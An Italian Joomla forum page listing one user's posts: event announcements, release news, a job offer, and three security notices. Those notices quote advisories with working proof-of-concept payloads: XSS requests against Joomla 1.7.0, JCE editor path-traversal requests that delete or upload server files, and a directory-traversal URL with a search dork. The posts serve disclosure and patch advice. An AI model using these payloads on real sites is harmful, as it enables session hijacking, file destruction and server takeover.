Back to top

Visualizza post

Questa sezione ti permette di visualizzare tutti i post inviati da questo utente. N.B: puoi vedere solo i post relativi alle aree dove hai l'accesso.


Topics - jeckodevelopment

Pagine: [1] 2 3
2
Joomladay / JoomlaDay Italia 2019 - Milano - 19 ottobre
« il: 04 Set 2019, 12:34:17 »
Il JoomlaDay Italia 2019 si terrà a Milano, presso lo Starhotels Business Palace il prossimo 19 ottobre.
La location è facilmente raggiungibile con i mezzi pubblici:- fermata metro linea gialla "Porto di mare"- dista 1,5km dalla stazione ferroviaria Milano Rogoredo.


L'evento è stato pubblicato anche sul sito ufficiale degli eventi Joomla: https://community.joomla.org/events/joomladays/4000-joomladay-italy-2019.html
Quest'anno il JoomlaDay ospiterà:- Talk & Workshop- "Bugs & Fun", aderendo all'iniziativa Pizza Bugs & Fun globale.- Esame di Certificazione ufficiale Joomla.
Un po' di informazioni utili:E' già possibile iscriversi al JoomlaDay 2019: https://www.joomla.it/notizie/9038-aperte-le-iscrizioni-al-joomladay-italia-2019.html



5
Joomladay / JoomlaDay Italia 2018 - Torino - 27 ottobre
« il: 20 Set 2018, 14:33:55 »
Sono disponibili i biglietti per il JoomlaDay Italia 2018 che si terrà a Torino il 27 ottobre 2018!
Come di consueto, l’ingresso all’evento è gratuito previa iscrizione tramite l’apposito modulo, che vi permetterà di prenotare il vostro posto. Vi ricordiamo infatti che il numero dei partecipanti è limitato ai primi 700 che si iscriveranno.

Per ulteriori informazioni sul JoomlaDay:

6
Il team del JoomlaDay Italia 2018 si è messo all'opera per stipulare delle convenzioni con le strutture alberghiere di Torino al fine di garantire delle condizioni vantaggiose ai partecipanti del JoomlaDay.
Link all'articolo: http://www.joomla.it/notizie/8870-disponibili-le-convenzioni-per-i-partecipanti-al-joomladay-torino-2018.html



7
Il Progetto Joomla è lieto di annunciare la disponibilità di Joomla 4.0 Alpha 4 per i test.

Informazioni sulla versione Alpha 4
Link all'Articolo: http://www.joomla.it/219-notizie/8869-joomla-4-e-all-orizzonte-alpha-4-disponibile.html

8
Articoli della community / Aiutaci a testare Joomla 3.9
« il: 12 Lug 2018, 08:48:02 »
Joomla 3.9, la release dedicata a Privacy e GDPR, è in dirittura d'arrivo grazie al lavoro dei volontari di Joomla che hanno contribuito allo sviluppo delle nuove funzionalità della Privacy Tools Suite. Prima del rilascio della versione stabile è necessario però eseguire una grande quantità di test per evitare bug e problemi.
Chiunque può aiutare a testare Joomla 3.9 ed aiutare il team di sviluppo a garantire una release di alta qualità.
Link all'articolo: http://www.joomla.it/notizie/8866-aiutaci-a-testare-joomla-3-9.html

10
Joomla! 3 / Disponibile nuovo aggiornamento Joomla! 3.8.7
« il: 18 Apr 2018, 19:47:42 »
Disponibile il nuovo aggiornamento di Joomla 3.8.7


Link all'articolo: http://www.joomla.it/notizie/8841-disponibile-aggiornamento-joomla-3-8-7.html

11
Start-up che lavora nel settore food, con sede operativa a Milano (MI). Più precisamente l'azienda propone un servizio di delivery integrato di piatti gourmet, sani e bilanciati.
In particolare sono richieste competenze per:
* Utilizzo Joomla! ed Hikashop
* Competenze CSS
* Programmazione, HTML, PHP e JavaScript (conoscenza di base jQuery);
Saranno ritenute qualificanti o preferenziali
- Esperienza nello sviluppo e implementazione di siti web e CMS
- Bilinguismo italiano e inglese.

Sede di lavoro: Milano (MI)
Settore: Food
Orario: 25 ore/settimana
Contratto: Stage
Titolo di Studio: Diploma di Maturità
Retribuzione: retribuzione 500€/mese (variabile in base all'esperienza), con ottime possibilità di ulteriori sviluppi

Inviate i vostri CV a info@featfood.it
Per informazioni: Andrea Lippolis | Lorenzo Danese

Feat Food Srl - P.IVA 04695050759

12
Joomladay / Joomla! User Group - Lecce
« il: 16 Nov 2015, 17:24:34 »
Cari amici joomlers,
Il Joomla! User Group Lecce è alla ricerca degli appassionati di Joomla‬ che si trovano a Lecce e dintorni.
Ti piace Joomla? Lo usi o vuoi conoscerlo meglio? Hai qualche progetto a riguardo? Stai cercando altri appassionati di questo CMS?
 Scrivi una mail a juglecce@gmail.com oppure visita la pagina Facebook https://www.facebook.com/joomlalecce/

13
ho un paio di domande da farvi su VirtueMart dato che non ho mai avuto modo di interfacciarmici in maniera diretta e seria ed il primo approccio non è stato dei migliori.

1) Esiste un modo per evitare che i visitatori vedano i prezzi, ma che questi siano visibili solo agli utenti registrati? (Nella versione 1.x era fattibile tramite un'impostazione, ma nella 2.x non trovo l'opzione corrispondente)

2) Esiste un modo per avere un calcolo della marginalità? Mi spiego: inserisco i prodotti e specifico il prezzo di costo per il venditore, cioè il prezzo che io pago ai miei fornitori, il sistema sulla base di questo prezzo fa un confronto con il prezzo finale di vendita e mi dice quanto ho guadagnato su ogni fattura? Da quanto ho visto con i campi prezzo c'è un po' di confusione (o sono io un incompetente, cosa probabile). Chiarisco, a quanto ho capito io, nel campo prezzo di costo devo specificare il prezzo IVA esclusa del prodotto (che in realtà non è il prezzo che io venditore pago il prodotto), automaticamente il sistema mi applica l'IVA (10% su alcuni prodotti, 21% sugli altri). Io non ho un modo per sapere quindi quanto guadagno dalle vendite? Devo ricorrere a qualche plugin?


Grazie! :)
   
 

14
Articoli della community / Joomla e gli Smartphone
« il: 06 Set 2012, 19:58:27 »
Ciao a tutti! :)
ho tradotto il bell'articolo "Joomla and Smartphones" pubblicato sul magazine di Joomla.org da Hagen Graf

Link all'articolo: http://www.joomla.it/articoli-community-16-e-17-tab/6203-joomla-e-gli-smartphone.html

15
Salve gente,
nel wiki di Joomla 2.5 è disponibile la traduzione della guida "Converting a template for Joomla 3" pubblicata originariamente sul wiki di Joomla.org

Attenzione, la traduzione, così come l'originale, è ancora un work in progress, quindi è soggetto a modifiche/integrazioni/aggiornamenti.

Il link alla pagina del wiki italiano:
http://www.joomla.it/mediawiki/index.php/Joomla!_2.5:Convertire_un_template_per_Joomla_3

16
Articoli della community / Cosa c'è di nuovo in Joomla 2.5.6
« il: 21 Giu 2012, 22:59:19 »
Salve gente!  ;)
ho tradotto l'articolo "What's new in Joomla 2.5.6" pubblicato su Joomla.org
Nell'articolo sono presentate tutte le novità che queste due versioni accoppiate (2.5.5 e 2.5.6) hanno portato al progetto: dalla possibilità di creare copie di template, all'upload multiplo in gestione media, ai Termini di Servizio e tanto altro ancora.

Link all'articolo: http://www.joomla.it/articoli-community-16-e-17-tab/5614-cosa-ce-di-nuovo-in-joomla-256.html

17
Sicurezza / Perché è importante aggiornare a Joomla 1.7.1
« il: 03 Ott 2011, 14:48:20 »
Subito dopo la pubblicazione del pacchetto di aggiornamento alla nuova versione di Joomla 1.7.x, per la precisione la 1.7.1 sono comparsi in rete gli avvisi relativi agli exploit possibili sulla versione 1.7.0.

Seguono i dati della vulnerabilità e consiglio a tutti coloro che utilizzino ancora Joomla 1.7.0 di aggiornare rapidamente alla versione 1.7.1.
Ricordo inoltre che la versione 1.6.x di Joomla non è più supportata, pertanto è consigliato l'aggiornamento al nuovo ramo 1.7.x

Codice: [Seleziona]
Joomla! 1.7.0 | Multiple Cross Site Scripting (XSS) Vulnerabilities
 
 
 
 1. OVERVIEW
 
 Joomla! 1.7.0 (stable version) is vulnerable to multiple Cross Site
 Scripting issues.
 
 
 2. BACKGROUND
 
 Joomla is a free and open source content management system (CMS) for
 publishing content on the World Wide Web and intranets. It comprises a
 model–view–controller (MVC) Web application framework that can also be
 used independently.
 Joomla is written in PHP, uses object-oriented programming (OOP)
 techniques and software design patterns, stores data in a MySQL
 database, and includes features such as page caching, RSS feeds,
 printable versions of pages, news flashes, blogs, polls, search, and
 support for language internationalization.
 
 
 3. VULNERABILITY DESCRIPTION
 
 Several parameters (searchword, extension, asset, author ) in Joomla!
 Core components are not properly sanitized upon submission to the
 /index.php url, which allows attacker to conduct Cross Site Scripting
 attack. This may allow an attacker to create a specially crafted URL
 that would execute arbitrary script code in a victim's browser.
 
 
 4. VERSION AFFECTED
 
 1.7.0 <=
 
 
 5. PROOF-OF-CONCEPT/EXPLOIT
 
 
 component: com_search, parameter: searchword (Browser: IE, Konqueror)
 =====================================================================
 
 
 [REQUEST]
 POST /joomla17_noseo/index.php HTTP/1.1
 Host: localhost
 Accept: */*
 Accept-Language: en
 User-Agent: MSIE 8.0
 Connection: close
 Referer: http://localhost/joomla17_noseo
 Content-Type: application/x-www-form-urlencoded
 Content-Length: 456
 
 
 task=search&Itemid=435&searchword=Search';onunload=function(){x=con
 firm(String.fromCharCode(89,111,117,39,118,101,32,103,111,116,32,97,32,109,
 101,115,115,97,103,101,32,102,114,111,109,32,65,100,109,105,110,105,115,116
 ,114,97,116,111,114,33,10,68,111,32,121,111,117,32,119,97,110,116,32,116,11
 1,32,103,111,32,116,111,32,73,110,98,111,120,63));alert(String.fromCharCode
 (89,111,117,39,118,101,32,103,111,116,32,88,83,83,33));};//xsssssssssss&
 ;option=com_search
 [/REQUEST]
 
 
 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
 
 User Login is required to execute the following XSSes.
 
 
 Parameter: extension, Component: com_categories
 ====================================================
 
 http://localhost/joomla17_noseo/administrator/index.php?option=com_categori
 es&extension=com_content%20%22onmouseover=%22alert%28/XSS/%29%22style=%
 22width:3000px!important;height:3000px!important;z-index:999999;position:ab
 solute!important;left:0;top:0;%22%20x=%22
 
 
 Parameter: asset , Component: com_media
 ====================================================
 
 http://localhost/joomla17_noseo/administrator/index.php?option=com_media&am
 p;view=images&tmpl=component&e_name=jform_articletext&asset=1%2
 2%20onmouseover=%22alert%28/XSS/%29%22style=%22width:3000px!important;heigh
 t:3000px!important;z-index:999999;position:absolute!important;left:0;top:0;
 %22x=%22&author=
 
 
 Parameter: author, Component: com_media
 ====================================================
 
 http://localhost/joomla17_noseo/administrator/index.php?option=com_media&am
 p;view=images&tmpl=component&e_name=jform_articletext&asset=&am
 p;author=1%22%20onmouseover=%22alert%28/XSS/%29%22style=%22width:3000px!imp
 ortant;height:3000px!important;z-index:999999;position:absolute!important;l
 eft:0;top:0;%22x=%22
 
 
 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
 
 
 6. IMPACT
 
 Attackers can compromise currently logged-in user/administrator
 session and impersonate arbitrary user actions available under
 /administrator/ functions.
 
 
 7. SOLUTION
 
 Upgrade to Joomla! 1.7.1-stable or higher.
 
 
 8. VENDOR
 
 Joomla! Developer Team
 http://www.joomla.org
 
 
 9. CREDIT
 
 This vulnerability was discovered by Aung Khant, http://yehg.net, YGN
 Ethical Hacker Group, Myanmar.
 
 
 10. DISCLOSURE TIME-LINE
 
 2011-07-29: notified vendor
 2011-09-26: patched version, 1.7.1-stable, released
 2011-09-29: vulnerability disclosed
 
 
 11. REFERENCES
 
 Original Advisory URL:
 http://yehg.net/lab/pr0js/advisories/joomla/core/%5Bjoomla_1.7.0-stable%5D_
 cross_site_scripting%28XSS%29
 Vendor Advisory URLs:
 http://developer.joomla.org/security/news/367-20110901-core-xss-vulnerabili
 ty
 http://developer.joomla.org/security/news/368-20110902-core-xss-vulnerabili
 ty
 

18
Un sito web, http://joomlagov.info/ ha raccolto i dati sull'utilizzo di Joomla nella Pubblica amministrazione, in particolare nei portali ufficiali delle città e dei comuni.
L'italia è al primo posto per l'utilizzo di Joomla, con ben 760 utilizzi, staccando nettamente la Spagna, al secondo posto con 207 siti in Joomla.

Chi vuole approfondire: http://joomlagov.info/

19
Diverse vulnerabilità trovate nel popolare editor JCE versione 2.0.1.0 e precedenti.
Non è stata ancora rilasciata una patch correttiva, si consiglia di visitare il sito web dello sviluppatore.

Temporaneamente si consiglia di restringere i permessi in scrittura (quindi all'editor) esclusivamente agli utenti fidati in attesa della nuova versione.

Citazione
#######################################
#
# Title: JCE Joomla Extension <=2.0.10 Multiple Vulnerabilities
# Vendor: www.joomlacontenteditor.net
# Exploit: Available
# Vulnerable Version: 2.0.10 (Image Manager 1.5.7.13, Media Manager
1.5.6.3, Template Manager 1.5.5, File Manager 1.5.4.1 & prior versions
also may be affected)
# Impact: High
# Fix: N/A
###################################################################################
####################
1. Description:
####################
     JCE is an extension for Joomla!, that provides you with a set of
wysiwyg editor tools that makes the job of writing articles for your
Joomla! site a little bit easier.
     In a nutshell, it provides access to many of the features you may
be used to using in Word or OpenOffice etc.
####################
2. Vulnerabilities:
####################
     2.1. Path Traversal Flaws. Path Traversal in "Image Manager",
"Media Manager", "Template Manager" and "File Manager" section.
         2.1.1. Exploit:
                         Check the exploit/POC section.
     2.2. Path Manipulation Flaws. Path Manipulation in "Image Manager",
"Media Manager", "Template Manager", "File Manager" section. Attackers
can delete any file or upload files to all the directories of the server.
         2.2.1. Exploit:
                         Check the exploit/POC section.
     2.3. Unsafe function Flaws. Attackers can use unsafe function
called "folderRename" for changing Image type extension (.jpg, .gif,
.png & etc.) to any extension like .htaccess or .php in "Image Manager",
"Media Manager", "Template Manager" and "File Manager" section.
         2.3.1. Exploit:
                         Check the exploit/POC section.
####################
3. Exploits/PoCs:
####################
Original Exploit URL: http://www.bugreport.ir/78/exploit.htm
     3.1. Path Traversal Flaws. Path Traversal in "Image Manager",
"Media Manager", "Template Manager" and "File Manager" section.
         -------------
         Path Traversal and see all directories:
         Step 1 +--> Click on root (left bar)
         Step 2 +--> Use Proxy (like burp) for changing path:
                     json={"fn":"getItems","args":["/","all",0,""]}   
              to           
  json={"fn":"getItems","args":["../../","all",0,""]}
         -------------
     3.2. Path Manipulation Flaws. Path Manipulation in "Image Manager",
"Media Manager", "Template Manager", "File Manager" section. Attackers
can delete any file or upload files to all the directories of the server.
         -------------
         For uploading file:
         Step 1 +--> Upload a file with image type extension like azizi.jpg
         Step 2 +--> Click on root (left bar)
         Step 3 +--> Use Proxy (like burp) and change "json" parameter
to json={"fn":"fileCopy","args":["/azizi.jpg","../../"]}
         Now azizi.jpg copied to root directory.
         For deleting file:
         Step 1 +--> Click on root (left bar)
         Step 2 +--> Use Proxy (like burp) and change "json" parameter
to json={"fn":"fileDelete","args":"../../index.php"}
         Now index.php has been deleted.
         -------------
     3.3. Unsafe function Flaws. Attackers can use unsafe function for
changing Image type extension (.jpg, .gif, .png & etc.) to any extension
like .htaccess or .php in "Image Manager", "Media Manager", "Template
Manager" and "File Manager" section.
         -------------
         For uploading file with executable extension:
         Step 1 +--> Upload a file with image type extension like azizi.jpg
         Step 2 +--> Click on root (left bar)
         Step 3 +--> Use Proxy (like burp) and change "json" p
####################
4. Solution:
####################
     Restricting and granting only trusted users having access to
resources and wait for vender patch.

20
Citazione
# Exploit Title: Joomla Simple File Lister module <= 1.0 Directory Traversal Vulnerability
# Google Dork: "Simple File Lister v1.0" "Files in directory"
# Date: 2011-08-28
# Author: evilsocket
# Software Link: http://extensions.joomla.org/extensions/core-enhancements/file-management/15793
# Version: 1.0
---------------
Vulnerable code
---------------
[ helper.php line 51 ]
function getDirContents($params, $sfl_dirlocation, $sfl_basepath, $sfl_maxfiles, $sfl_userlocation) {
  ...
  ...
  really messy code, generally speaking the variable $sfl_dirlocation which contains the directory to be
  read is not succesfully sanitized for relative paths
  ...
  ...
---
PoC
---
http://www.site.com/index.php?option=com_content&view=article&id=[A VALID ID]&Itemid=[A VALID ID]&sflaction=dir&sflDir=../../../
To look for a valid url, just sniff the HTTP request sent from the module javascript code once a directory is clicked.

Al momento non è stata pubblicata una patch correttiva, si consiglia di visitare il sito dello sviluppatore dell'estensione.

Pagine: [1] 2 3


Web Design Bolzano Kreatif